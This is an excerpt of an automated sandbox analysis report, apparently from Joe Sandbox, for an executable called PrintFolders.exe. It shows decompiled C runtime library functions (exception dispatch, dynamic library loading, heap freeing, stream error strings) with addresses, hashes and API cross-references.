Instruction Fuzzy Hash: A941EB30A01208EBCF10DF6AC885A9EBBB1FF4C318F14915AE8155B3D2C779E911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00411BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00411BE0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E0042C1EE(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x43d054;
				E00411BA0(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x43d054);
				E00412C3C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E00412F60(_t80, 0xfffffffe, _t103, 0x43d054);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E00412F00(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E00411BA0(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x42f198;
											if(__eflags != 0) {
												_t75 = E0042BBF0(__eflags, 0x42f198);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x42f198; // 0x40fff3
													 *0x42e234(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E00412F40(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E00412F60(_t68, _t100, _t103, 0x43d054);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E00411BA0(_t80, _t95, _t100, _t103, _v12);
										E00412F20();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x00411be0
0x00411be7
0x00411beb
0x00411bec
0x00411bf2
0x00411bfe
0x00411c00
0x00411c06
0x00411c06
0x00411c0f
0x00411c11
0x00411c14
0x00411c17
0x00411c1f
0x00411c24
0x00411c27
0x00411c2a
0x00411c31
0x00411c8d
0x00411c90
0x00411c98
0x00411c9f
0x00000000
0x00411c9f
0x00000000
0x00411c33
0x00411c33
0x00411c39
0x00411c3f
0x00411c45
0x00411cb0
0x00411cb9
0x00411c47
0x00411c47
0x00411c47
0x00411c4d
0x00411c50
0x00411c53
0x00411c56
0x00411c59
0x00411c5e
0x00411c74
0x00000000
0x00411c60
0x00411c60
0x00411c62
0x00411c67
0x00411c69
0x00411c6c
0x00411c6e
0x00411c84
0x00411ca4
0x00411ca4
0x00411ca8
0x00000000
0x00411c70
0x00411c70
0x00411cba
0x00411cbd
0x00411cc3
0x00411cc5
0x00411ccc
0x00411cd3
0x00411cd8
0x00411cdb
0x00411cdd
0x00411cdf
0x00411cec
0x00411cf2
0x00411cf4
0x00411cf7
0x00411cf7
0x00411cfa
0x00411cfa
0x00411ccc
0x00411d00
0x00411d02
0x00411d07
0x00411d0a
0x00411d0d
0x00411d15
0x00411d19
0x00411d1e
0x00411d1e
0x00411d21
0x00411d25
0x00411d28
0x00411d38
0x00411d3d
0x00411d41
0x00411d44
0x00411d47
0x00411d49
0x00411d4f
0x00411d52
0x00411d52
0x00411d55
0x00411d55
0x00411d57
0x00411d59
0x00000000
0x00000000
0x00411d5b
0x00411d5d
0x00000000
0x00411d5f
0x00411d5f
0x00411d62
0x00411d65
0x00000000
0x00411d67
0x00411d67
0x00411d6a
0x00411d6d
0x00411d6f
0x00000000
0x00411d71
0x00000000
0x00411d71
0x00411d6f
0x00411d65
0x00000000
0x00411d5d
0x00411d73
0x00411d75
0x00411d75
0x00411d79
0x00411d4b
0x00411d4b
0x00411d4b
0x00411d4e
0x00411d4e
0x00411c72
0x00000000
0x00411c72
0x00411c70
0x00411c6e
0x00000000
0x00411c77
0x00411c77
0x00411c79
0x00411c80
0x00000000
0x00411c82
0x00000000
0x00411c80
0x00411c45
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00411C17
___except_validate_context_record.LIBVCRUNTIME ref: 00411C1F
_ValidateLocalCookies.LIBCMT ref: 00411CA8
__IsNonwritableInCurrentImage.LIBCMT ref: 00411CD3
_ValidateLocalCookies.LIBCMT ref: 00411D28

Strings

csm, xrefs: 00411CBD

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
Instruction ID: bee35b64c31f227da84885fae90110515caed0ba2fa3c8c6cd36066413939370
Opcode Fuzzy Hash: e0701a756b8fd532e6c54edd9633cc2f37b64c963fcb2cfba846efdf3320919d
Instruction Fuzzy Hash: 81412B30E002089BCF10DF69C880ADEBBB1EF05318F54805BEA149B361E779DA95CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00424203 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424203(intOrPtr* _a4, intOrPtr _a8, char _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t7 =  &_a16; // 0x424356
						_t14 = E00420094( *_t7, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00420094(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E004135BB(GetLastError());
									_t17 =  *((intOrPtr*)(E004135F1(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00419D92(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E004135BB(GetLastError());
						_t17 =  *((intOrPtr*)(E004135F1(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00419D92(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00419E17(_a8);
				return 0;
			}

0x00424209
0x0042420e
0x00424222
0x00424225
0x00424254
0x00424257
0x0042425f
0x00424261
0x0042427a
0x0042427d
0x00424280
0x0042428e
0x0042429d
0x004242a5
0x004242a7
0x004242c0
0x004242c3
0x004242c3
0x004242a9
0x004242b0
0x004242bb
0x004242bb
0x004242c5
0x004242c6
0x00000000
0x004242c6
0x00424285
0x0042428a
0x0042428c
0x00000000
0x00000000
0x00000000
0x0042428c
0x0042426a
0x00424275
0x00000000
0x00424275
0x00424227
0x0042422a
0x0042422d
0x00424240
0x00424243
0x00424245
0x00424247
0x00000000
0x00424247
0x00424233
0x00424238
0x0042423a
0x00000000
0x00000000
0x00000000
0x0042423a
0x00424213
0x00000000

Strings

C:\Program Files (x86)\PrintFolders\PrintFolders.exe, xrefs: 00424208
VCB, xrefs: 00424254

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files (x86)\PrintFolders\PrintFolders.exe$VCB
API String ID: 0-2149205796
Opcode ID: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
Instruction ID: ff3a756bc587a2ce23644913c84b3eb2307a4a6ea4fbf3a266a3dc89f95f590a
Opcode Fuzzy Hash: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
Instruction Fuzzy Hash: FB21F231300225FF9B20AF63EC40E6B739DEF807A8751465AF91597241E738ED818778

Uniqueness

Uniqueness Score: -1.00%

Function 1000800F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000800F(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x10017ec8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x10010fb8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E10007808(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E10007808(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x10008018
0x100080c2
0x10008020
0x10008022
0x10008029
0x1000802b
0x10008031
0x1000803e
0x10008053
0x10008057
0x100080a9
0x100080a9
0x100080ae
0x100080b2
0x100080b5
0x100080b5
0x100080bb
0x100080bd
0x100080d2
0x100080cd
0x100080d1
0x100080d1
0x100080bf
0x100080bf
0x00000000
0x100080bf
0x10008059
0x10008062
0x10008099
0x10008099
0x1000809b
0x1000809d
0x00000000
0x00000000
0x100080a5
0x00000000
0x100080a5
0x1000806c
0x10008071
0x10008076
0x00000000
0x00000000
0x10008080
0x10008085
0x1000808a
0x00000000
0x00000000
0x1000808f
0x10008095
0x00000000
0x10008095
0x10008036
0x00000000
0x00000000
0x00000000
0x1000803c
0x100080cb
0x00000000

Strings

api-ms-, xrefs: 10008066
ext-ms-, xrefs: 1000807A

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 495c40b57803ef5ef3fb5807e2b2eab896702d7168f31e2b001653fa3d16e092
Instruction ID: 90a9feae873bb1b7bb8f48b179cd5688537d64e801fb6ee6e67ba8e33ea3485b
Opcode Fuzzy Hash: 495c40b57803ef5ef3fb5807e2b2eab896702d7168f31e2b001653fa3d16e092
Instruction Fuzzy Hash: BD219675A01221ABF7A2CB248D84A4A3698FB057E0F224655FDC5A7295DB70EE0487E1

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041E4C8(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x450ae8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x431b70 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E004162B4(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E004162B4(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0041e4d1
0x0041e57b
0x0041e4d9
0x0041e4db
0x0041e4e2
0x0041e4e4
0x0041e4ea
0x0041e4f7
0x0041e50c
0x0041e510
0x0041e562
0x0041e562
0x0041e567
0x0041e56b
0x0041e56e
0x0041e56e
0x0041e574
0x0041e576
0x0041e58b
0x0041e586
0x0041e58a
0x0041e58a
0x0041e578
0x0041e578
0x00000000
0x0041e578
0x0041e512
0x0041e51b
0x0041e552
0x0041e552
0x0041e554
0x0041e556
0x00000000
0x00000000
0x0041e55e
0x00000000
0x0041e55e
0x0041e525
0x0041e52a
0x0041e52f
0x00000000
0x00000000
0x0041e539
0x0041e53e
0x0041e543
0x00000000
0x00000000
0x0041e548
0x0041e54e
0x00000000
0x0041e54e
0x0041e4ef
0x00000000
0x00000000
0x00000000
0x0041e4f5
0x0041e584
0x00000000

Strings

api-ms-, xrefs: 0041E51F
ext-ms-, xrefs: 0041E533

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
Instruction ID: a070aaca4d8e33c421c8892c34a803ef62d39d78bd865ca4f18396a08a3380d9
Opcode Fuzzy Hash: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
Instruction Fuzzy Hash: 9F21DE39E01220F7D73147679C44A9B3769AF05BA4F550136ED06A7390E638ED41C6DD

Uniqueness

Uniqueness Score: -1.00%

Function 1000BB3C Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000BB3C(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E1000BB04(_t45, 7);
					E1000BB04(_t45 + 0x1c, 7);
					E1000BB04(_t45 + 0x38, 0xc);
					E1000BB04(_t45 + 0x68, 0xc);
					E1000BB04(_t45 + 0x98, 2);
					E10008701( *((intOrPtr*)(_t45 + 0xa0)));
					E10008701( *((intOrPtr*)(_t45 + 0xa4)));
					E10008701( *((intOrPtr*)(_t45 + 0xa8)));
					E1000BB04(_t45 + 0xb4, 7);
					E1000BB04(_t45 + 0xd0, 7);
					E1000BB04(_t45 + 0xec, 0xc);
					E1000BB04(_t45 + 0x11c, 0xc);
					E1000BB04(_t45 + 0x14c, 2);
					E10008701( *((intOrPtr*)(_t45 + 0x154)));
					E10008701( *((intOrPtr*)(_t45 + 0x158)));
					E10008701( *((intOrPtr*)(_t45 + 0x15c)));
					return E10008701( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x1000bb42
0x1000bb47
0x1000bb50
0x1000bb5b
0x1000bb66
0x1000bb71
0x1000bb7f
0x1000bb8a
0x1000bb95
0x1000bba0
0x1000bbae
0x1000bbbc
0x1000bbcd
0x1000bbdb
0x1000bbe9
0x1000bbf4
0x1000bbff
0x1000bc0a
0x00000000
0x1000bc1a
0x1000bc1f

APIs

Part of subcall function 1000BB04: _free.LIBCMT ref: 1000BB29

_free.LIBCMT ref: 1000BB8A

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 1000BB95
_free.LIBCMT ref: 1000BBA0
_free.LIBCMT ref: 1000BBF4
_free.LIBCMT ref: 1000BBFF
_free.LIBCMT ref: 1000BC0A
_free.LIBCMT ref: 1000BC15

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a7358a4db6e1da6d63c69c07c6b5017a17c7ec25ee6c44925f82e9684ad80130
Instruction ID: 50d7879656c57a25cf13df4160670f294727ae21723d392f61a5f7ff99cca00a
Opcode Fuzzy Hash: a7358a4db6e1da6d63c69c07c6b5017a17c7ec25ee6c44925f82e9684ad80130
Instruction Fuzzy Hash: D2112C75550B04EAEA20FBB0CC46FDB77ADEF00780F900815B2ADA616EDBA5B504CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00443054 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044301C: _free.LIBCMT ref: 00443041

_free.LIBCMT ref: 004430A2
_free.LIBCMT ref: 004430AD
_free.LIBCMT ref: 004430B8
_free.LIBCMT ref: 0044310C
_free.LIBCMT ref: 00443117
_free.LIBCMT ref: 00443122
_free.LIBCMT ref: 0044312D

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
Instruction ID: 18b0f10dc80f86e3b47954cd7ac735c8865c2d37fda3f0ccca68a77a81fef9d4
Opcode Fuzzy Hash: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
Instruction Fuzzy Hash: 3F116D31540B04FAFE20FFB2CC07FCB77AC5F05B06F40491EB29966066DA6EEA445699

Uniqueness

Uniqueness Score: -1.00%

Function 00426011 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00426011(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00425D5D(_t45, 7);
					E00425D5D(_t45 + 0x1c, 7);
					E00425D5D(_t45 + 0x38, 0xc);
					E00425D5D(_t45 + 0x68, 0xc);
					E00425D5D(_t45 + 0x98, 2);
					E0041E2B8( *((intOrPtr*)(_t45 + 0xa0)));
					E0041E2B8( *((intOrPtr*)(_t45 + 0xa4)));
					E0041E2B8( *((intOrPtr*)(_t45 + 0xa8)));
					E00425D5D(_t45 + 0xb4, 7);
					E00425D5D(_t45 + 0xd0, 7);
					E00425D5D(_t45 + 0xec, 0xc);
					E00425D5D(_t45 + 0x11c, 0xc);
					E00425D5D(_t45 + 0x14c, 2);
					E0041E2B8( *((intOrPtr*)(_t45 + 0x154)));
					E0041E2B8( *((intOrPtr*)(_t45 + 0x158)));
					E0041E2B8( *((intOrPtr*)(_t45 + 0x15c)));
					return E0041E2B8( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00426017
0x0042601c
0x00426025
0x00426030
0x0042603b
0x00426046
0x00426054
0x0042605f
0x0042606a
0x00426075
0x00426083
0x00426091
0x004260a2
0x004260b0
0x004260be
0x004260c9
0x004260d4
0x004260df
0x00000000
0x004260ef
0x004260f4

APIs

Part of subcall function 00425D5D: _free.LIBCMT ref: 00425D82

_free.LIBCMT ref: 0042605F

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 0042606A
_free.LIBCMT ref: 00426075
_free.LIBCMT ref: 004260C9
_free.LIBCMT ref: 004260D4
_free.LIBCMT ref: 004260DF
_free.LIBCMT ref: 004260EA

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction ID: b3dbb492fdefcd87f13974c7623e4ee0a28cf06b85d3f0612ad809807c760fc1
Opcode Fuzzy Hash: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction Fuzzy Hash: 5C11B431640B14AAD520B7B2DC0BFCBBB9C5F01344F808D1FF69D660A2EA7CB6408769

Uniqueness

Uniqueness Score: -1.00%

Function 00404360 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00404360(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				intOrPtr _v48;
				signed int _t20;
				void* _t22;
				void* _t32;
				signed char _t35;
				intOrPtr* _t37;
				char* _t40;
				intOrPtr* _t42;
				intOrPtr _t45;

				_t32 = __ebx;
				_t20 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t20;
				_t35 =  *(__ecx + 0x10) & _t20;
				if(_t35 == 0) {
					return _t20;
				} else {
					if(_a8 != 0) {
						E0041044B(0, 0);
					}
					if((_t35 & 0x00000004) == 0) {
						_t40 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t40 = "ios_base::badbit set";
					}
					_t22 = E00403B30( &_v32);
					_t37 =  &_v24;
					L00404280(_t32, _t37, _t40, _t22);
					E0041044B( &_v32, 0x43c040);
					asm("int3");
					_t45 = _v48;
					asm("xorps xmm0, xmm0");
					_t42 = _t37;
					 *_t42 = 0x42e2d4;
					asm("movq [eax], xmm0");
					_t14 = _t45 + 4; // 0x43c044
					E0040FF71(_t14, _t42 + 4);
					 *_t42 = 0x439c98;
					_t15 = _t45 + 0xc; // 0x43c050
					_t16 = _t45 + 0x10; // 0x5
					 *((intOrPtr*)(_t42 + 0xc)) =  *_t15;
					 *((intOrPtr*)(_t42 + 0x10)) =  *_t16;
					 *_t42 = 0x439d10;
					return _t42;
				}
			}

0x00404360
0x0040436c
0x0040436f
0x00404375
0x00404377
0x00404384
0x00404379
0x0040437d
0x0040438b
0x0040438b
0x00404393
0x004043a9
0x00404395
0x00404395
0x00404395
0x004043b0
0x004043b7
0x004043bb
0x004043ca
0x004043cf
0x004043d4
0x004043d7
0x004043db
0x004043e1
0x004043e7
0x004043eb
0x004043ef
0x004043f4
0x004043fd
0x00404400
0x00404403
0x00404408
0x0040440b
0x00404414
0x00404414

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004043EF

Part of subcall function 0041044B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,0040E035,?,0043B72C,?), ref: 004104AB

Strings

ios_base::eofbit set, xrefs: 004043A4
`=@, xrefs: 00404338, 0040440B
ios_base::failbit set, xrefs: 0040439F
ios_base::badbit set, xrefs: 00404395
`=@, xrefs: 004043F4

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: `=@$`=@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-2436082744
